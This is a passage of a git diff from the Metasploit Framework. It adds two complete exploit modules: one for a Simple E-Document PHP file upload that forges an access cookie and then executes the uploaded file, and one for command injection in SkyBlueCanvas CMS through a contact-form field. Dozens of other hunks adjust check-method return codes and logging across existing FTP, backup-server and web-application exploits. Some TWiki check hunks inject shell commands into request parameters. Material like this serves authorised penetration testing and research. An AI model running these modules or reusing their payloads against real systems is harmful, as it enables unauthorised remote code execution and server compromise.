'31142'] + ], + 'Payload' => + { + 'DisableNops' => true, + # Arbitrary big number. The payload gets sent as an HTTP + # response body, so really it's unlimited + 'Space' => 262144 # 256k + }, + 'Arch' => ARCH_PHP, + 'Platform' => 'php', + 'Targets' => + [ + # Tested on Simple E-Document versions 3.0 and 3.1 + [ 'Generic (PHP Payload)', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Jan 23 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to Simple E-Document', '/simple_e_document_v_1_31/']) + ], self.class) + end + + # + # Checks if target allows file uploads + # + def check + res = send_request_raw({ + 'uri' => normalize_uri(target_uri.path, 'upload.php'), + 'cookie' => 'access=3' + }) + + unless res + vprint_error("#{peer} - Connection timed out") + return Exploit::CheckCode::Unknown + end + + if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/ + vprint_error("#{peer} - File uploads are disabled") + return Exploit::CheckCode::Safe + end + + if res.body and res.body.to_s =~ /Upload File/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + # + # Uploads our malicious file + # + def upload + @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php" + php = "" + + data = Rex::MIME::Message.new + data.add_part('upload', nil, nil, 'form-data; name="op1"') + data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"") + post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_') + + print_status("#{peer} - Uploading malicious file...") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'upload.php'), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'cookie' => 'access=3', + 'data' => post_data, + 'vars_get' => { + 'op' => 'newin' + } + }) + + fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") unless res + fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404 + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/) + + print_good("#{peer} - Payload uploaded successfully.") + register_files_for_cleanup(@fname) + + if res.body.to_s =~ /
folder to use: .+#{target_uri.path}\/?(.+)
/ + @upload_path = normalize_uri(target_uri.path, "#{$1}") + print_good("#{peer} - Found upload path #{@upload_path}") + else + @upload_path = normalize_uri(target_uri.path, 'in') + print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'") + end + end + + # + # Executes our uploaded malicious file + # + def exec + print_status("#{peer} - Executing #{@fname}...") + res = send_request_raw({ + 'uri' => normalize_uri(@upload_path, @fname), + 'cookie' => 'access=3' + }) + if res and res.code == 404 + fail_with(Failure::NotFound, "#{peer} - Not found: #{@fname}") + end + end + + # + # Just upload and execute + # + def exploit + upload + exec + end +end diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb new file mode 100644 index 0000000000..6a9f3d4db2 --- /dev/null +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -0,0 +1,94 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'SkyBlueCanvas CMS Remote Code Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability + in SkyBlueCanvas CMS version 1.1 r248-03 and below. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Scott Parish', # Vulnerability discovery and exploit + 'xistence ' # Metasploit Module + ], + 'References' => + [ + ['CVE', '2014-1683'], + ['OSVDB', '102586'], + ['BID', '65129'], + ['EDB', '31183'], + ['URL', 'http://packetstormsecurity.com/files/124948/SkyBlueCanvas-CMS-1.1-r248-03-Command-Injection.html'] + ], + 'Privileged' => false, + 'Payload' => + { + # Arbitrary big number. The payload gets sent as an HTTP + # response body, so really it's unlimited + 'Space' => 262144, # 256k + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl ruby bash telnet python' + } + }, + 'Platform' => %w{ unix }, + 'Targets' => + [ + ['SkyBlueCanvas 1.1 r248', {}] + ], + 'Arch' => ARCH_CMD, + 'DisclosureDate' => 'Jan 28 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]), + ],self.class) + end + + def check + uri = normalize_uri(target_uri.path.to_s, "index.php") + + res = send_request_raw('uri' => uri) + + if res and res.body =~ /[1.1 r248]/ + vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found") + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Safe + end + + def exploit + uri = normalize_uri(target_uri.path.to_s, "index.php") + + send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'vars_get' => { 'pid' => '4' }, + 'vars_post' => + { + 'cid' => '3', + 'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};", + 'email' => rand_text_alphanumeric(10), + 'subject' => rand_text_alphanumeric(10), + 'message' => rand_text_alphanumeric(10), + 'action' => 'Send' + } + }) + end +end diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 92728f82a2..555fe9b6e0 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -61,13 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.body =~ /Simple PHP Blog (\d)\.(\d)\.(\d)/) ver = [ $1.to_i, $2.to_i, $3.to_i ] - print_status("Simple PHP Blog #{ver.join('.')}") + vprint_status("Simple PHP Blog #{ver.join('.')}") if (ver[0] == 0 and ver[1] < 5) if (ver[1] == 4 and ver[2] > 0) return Exploit::CheckCode::Safe end - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end end diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index e7e821bf1c..0333f6ad1b 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("SPIP Version detected: #{version}") if version =~ /^2\.0/ and version < "2.0.21" - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif version =~ /^2\.1/ and version < "2.1.16" return Exploit::CheckCode::Appears elsif version =~ /^3\.0/ and version < "3.0.3" diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb index 632ad5f357..fd6fe00363 100644 --- a/modules/exploits/unix/webapp/squash_yaml_exec.rb +++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if response.code == 422 - print_status("Got HTTP 422 result, target may be vulnerable") + vprint_status("Got HTTP 422 result, target may be vulnerable") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 2322a13a9d..6d1469c346 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe if (ver2 > 8) return Exploit::CheckCode::Safe if (ver2 == 8 and ver3 > 0) end - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index 90757d4519..7aa18c42ea 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote http_fingerprint({ :response => res }) # check method if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/)) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 09abcf49e0..133b26b8a0 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -62,37 +62,37 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(datastore['URI']) target_code = 200 - print_status "Attempting to POST to #{uri}" + vprint_status "Attempting to POST to #{uri}" response = send_request_cgi({'uri' => uri, 'method' => 'POST'}) unless defined? response - print_error 'Server did not respond to HTTP POST request' - return Exploit::CheckCode::Safe + vprint_error 'Server did not respond to HTTP POST request' + return Exploit::CheckCode::Unknown end code = response.code unless code == target_code - print_error "Expected HTTP code #{target_code}, but got #{code}." + vprint_error "Expected HTTP code #{target_code}, but got #{code}." return Exploit::CheckCode::Safe end - print_status "We received the expected HTTP code #{target_code}" + vprint_status "We received the expected HTTP code #{target_code}" # We will need the cookie PHPSESSID to continue cookies = response.headers['Set-Cookie'] # Make sure cookies were set if defined? cookies and cookies =~ PHPSESSID_REGEX - print_status "We were successfully sent a PHPSESSID of '#{$1}'" + vprint_status "We were successfully sent a PHPSESSID of '#{$1}'" else - print_error 'The server did not send us the cookie we were looking for' + vprint_error 'The server did not send us the cookie we were looking for' return Exploit::CheckCode::Safe end # Okay, at this point we're just being silly and hackish. unless response.body =~ /langChoice/ - print_error 'The page does not appear to contain a langChoice field' + vprint_error 'The page does not appear to contain a langChoice field' return Exploit::CheckCode::Safe end @@ -109,17 +109,17 @@ class Metasploit3 < Msf::Exploit::Remote # Example footer: v2.6.1 ©2008 Fonality # if response.body =~ /(v2\.(?:[0-5]\.\d|6\.[0-1]))\s{2}©200[0-8] Fonality/ if response.body =~ /(v2\.6\.1)\s{2}©2008 Fonality/ - print_status "Trixbox #{$1} detected!" - return Exploit::CheckCode::Vulnerable + vprint_status "Trixbox #{$1} detected!" + return Exploit::CheckCode::Appears end - print_status 'The target may be skinned making detection too difficult' + vprint_status 'The target may be skinned making detection too difficult' if response.body =~ /trixbox - User Mode/ return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Unknown end + + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index cc7aeab507..0d1d620094 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -67,12 +67,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => test_url }, 25) if (not res) or (res.code != 404) - print_warning("WARNING: The test file exists already!") - return Exploit::CheckCode::Safe + vprint_warning("WARNING: The test file exists already!") + return Exploit::CheckCode::Unknown # Need to try again end # try to create it - print_status("Attempting to create #{test_url} ...") + vprint_status("Attempting to create #{test_url} ...") rev = rand_text_numeric(1+rand(5)) + ' `touch ' + test_file + '`#' res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(rev) @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => cmd_base + Rex::Text.uri_encode(rev) }, 25) if (not res) or (res.code != 200) - print_warning("WARNING: unable to remove test file (#{test_file})") + vprint_warning("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index f96efa6af0..5a931d0f21 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -153,15 +153,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /This site is running TWiki version.*TWiki-(\d\.\d\.\d)/ version = $1 - print_status("Version found: #{version}") + vprint_status("Version found: #{version}") if version < "5.1.3" return Exploit::CheckCode::Appears else - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Detected end end - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index a09df6375b..2af281e256 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -62,12 +62,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => test_url }, 25) if (not res) or (res.body.match(content)) - print_warning("WARNING: The test file exists already!") - return Exploit::CheckCode::Safe + vprint_warning("The test file exists already!") + return Exploit::CheckCode::Unknown # Need to try again with a different file end # try to create it - print_status("Attempting to create #{test_url} ...") + vprint_status("Attempting to create #{test_url} ...") search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'" res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(search) @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25) if (not res) or (res.code != 200) - print_warning("WARNING: unable to remove test file (#{test_file})") + vprint_warning("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 44ee6388a8..c18897d482 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -343,7 +343,7 @@ class Metasploit3 < Msf::Exploit::Remote node_id = get_node unless node_id.nil? - return Msf::Exploit::CheckCode::Vulnerable + return Msf::Exploit::CheckCode::Appears end res = send_request_cgi({ @@ -351,10 +351,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/ - return Msf::Exploit::CheckCode::Detected + return Msf::Exploit::CheckCode::Appears end - return Msf::Exploit::CheckCode::Unknown + return Msf::Exploit::CheckCode::Safe end def on_new_session(session) diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index becbb997bc..dcf88c8a12 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 5e932cffe7..9de059083a 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + vprint_status("#{peer} - Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - print_good "#{peer} - Authentication successful" + vprint_good "#{peer} - Authentication successful" session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0] else - print_error "#{peer} - Authentication failed" - return Exploit::CheckCode::Unknown + vprint_error "#{peer} - Service found, but authentication failed" + return Exploit::CheckCode::Detected end - print_status("#{peer} - Attempting to execute...") + vprint_status("#{peer} - Attempting to execute...") command = "echo #{rand_text_alphanumeric(rand(5) + 5)}" @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.message =~ /Document follows/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 96bb9c7cae..b77b968d9e 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -59,16 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) }) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /Eppler Software/ if res.body =~ / - v5\.1\.20101016/ - print_status("#{peer} - Found version: 5.1.20101016") - return Exploit::CheckCode::Vulnerable + vprint_status("#{peer} - Found version: 5.1.20101016") + return Exploit::CheckCode::Appears elsif res.body =~ / - v(5\.[\d\.]+)/ - print_status("#{peer} - Found version: #{$1}") + vprint_status("#{peer} - Found version: #{$1}") return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index 321429410d..bdb1719f9c 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index c8cd1a4cec..d52ecda3a8 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index b33a939eb8..0ad5036393 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /Upload a file/ - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index 223c23387f..8558d6edcb 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote end unless password.nil? - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index b8daa7a0c7..3f8dab74c2 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -81,19 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 if res.body =~ /ZM - Login<\/title>/ - print_error("#{peer} - Authentication failed") - return Exploit::CheckCode::Unknown + vprint_error("#{peer} - Service found, but authentication failed") + return Exploit::CheckCode::Detected elsif res.body =~ /v1.2(4\.\d+|5\.0)/ return Exploit::CheckCode::Appears elsif res.body =~ /<title>ZM/ return Exploit::CheckCode::Detected end end - return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index adbe4790d0..e4508a5448 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index a9ad2d65b4..3fce25e2a8 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -64,18 +64,18 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - print_status("Arkeia Server Information:") + vprint_status("Arkeia Server Information:") info.each_pair { |k,v| - print_status(" #{k + (" " * (30-k.length))} = #{v}") + vprint_status(" #{k + (" " * (30-k.length))} = #{v}") } if (info['System'] !~ /Windows/) - print_status("This module only supports Windows targets") + vprint_status("This module only supports Windows targets") return Exploit::CheckCode::Detected end if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 6f11e89844..2fd714b4ab 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -72,12 +72,12 @@ class Metasploit3 < Msf::Exploit::Remote def check info = ndmp_info() if (info and info['Version']) - print_status(" Vendor: #{info['Vendor']}") - print_status("Product: #{info['Product']}") - print_status("Version: #{info['Version']}") + vprint_status(" Vendor: #{info['Vendor']}") + vprint_status("Product: #{info['Product']}") + vprint_status("Version: #{info['Version']}") if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/) - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb index 2ab16594ab..98439c43e1 100644 --- a/modules/exploits/windows/brightstor/lgserver_multi.rb +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -59,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect - if ( ver and ver =~ /11.1.742/ ) - return Exploit::CheckCode::Vulnerable + if ( ver and ver =~ /11\.1\.742/ ) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index 69f2d859d9..5fdf8e7adb 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -58,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect - if ( ver and ver =~ /11.1.742/ ) - return Exploit::CheckCode::Vulnerable + if ( ver and ver =~ /11\.1\.742/ ) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index 6184fea782..4a0dae440c 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -58,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect - if ( ver and ver =~ /11.1.742/ ) - return Exploit::CheckCode::Vulnerable + if ( ver and ver =~ /11\.1\.742/ ) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index b2350639b3..0fe297e944 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -57,8 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect - if ( ver and ver =~ /11.1.742/ ) - return Exploit::CheckCode::Vulnerable + if ( ver and ver =~ /11\.1\.742/ ) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 85ec1cfdfd..41d788b2dd 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -74,7 +74,15 @@ class Metasploit3 < Msf::Exploit::Remote startxrefs = pdf_objects[2] root_obj = pdf_objects[3] - output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last) + output = basic_social_engineering_exploit({ + :xref_trailers => xref_trailers, + :root_obj => root_obj, + :stream => stream, + :trailers => trailers, + :file_name => file_name, + :exe_name => exe_name, + :startxref => startxrefs.last + }) print_status("Parsing Successful. Creating '#{datastore['FILENAME']}' file...") file_create(output) @@ -165,7 +173,15 @@ class Metasploit3 < Msf::Exploit::Remote end - def basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxref) + def basic_social_engineering_exploit(opts = {}) + + xref_trailers = opts[:xref_trailers] + root_obj = opts[:root_obj] + stream = opts[:stream] + trailers = opts[:trailers] + file_name = opts[:file_name] + exe_name = opts[:exe_name] + startxref = opts[:startxref] file_name = file_name.split(/\//).pop.to_s diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index ade7b85090..32095986ce 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/ability_server_stor.rb b/modules/exploits/windows/ftp/ability_server_stor.rb index 7cdc971e4f..5f48396b1f 100644 --- a/modules/exploits/windows/ftp/ability_server_stor.rb +++ b/modules/exploits/windows/ftp/ability_server_stor.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if banner =~ /Ability Server 2\.34/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else if banner =~ /Ability Server/ return Exploit::CheckCode::Detected diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index e657d375ce..ea1babc50c 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /CesarFTP 0\.99g/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 05e8bda803..18d38e518a 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote banner = sock.get(-1,3) disconnect if (banner =~ /Dream FTP Server/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index b1b8ac68f1..ab5a97838f 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /Easy File Sharing FTP Server/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index 58958b34df..0805ac2063 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /BigFoolCat/) # EasyFTP Server has undergone several name changes - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 4ec0fcad81..e230140ad1 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner 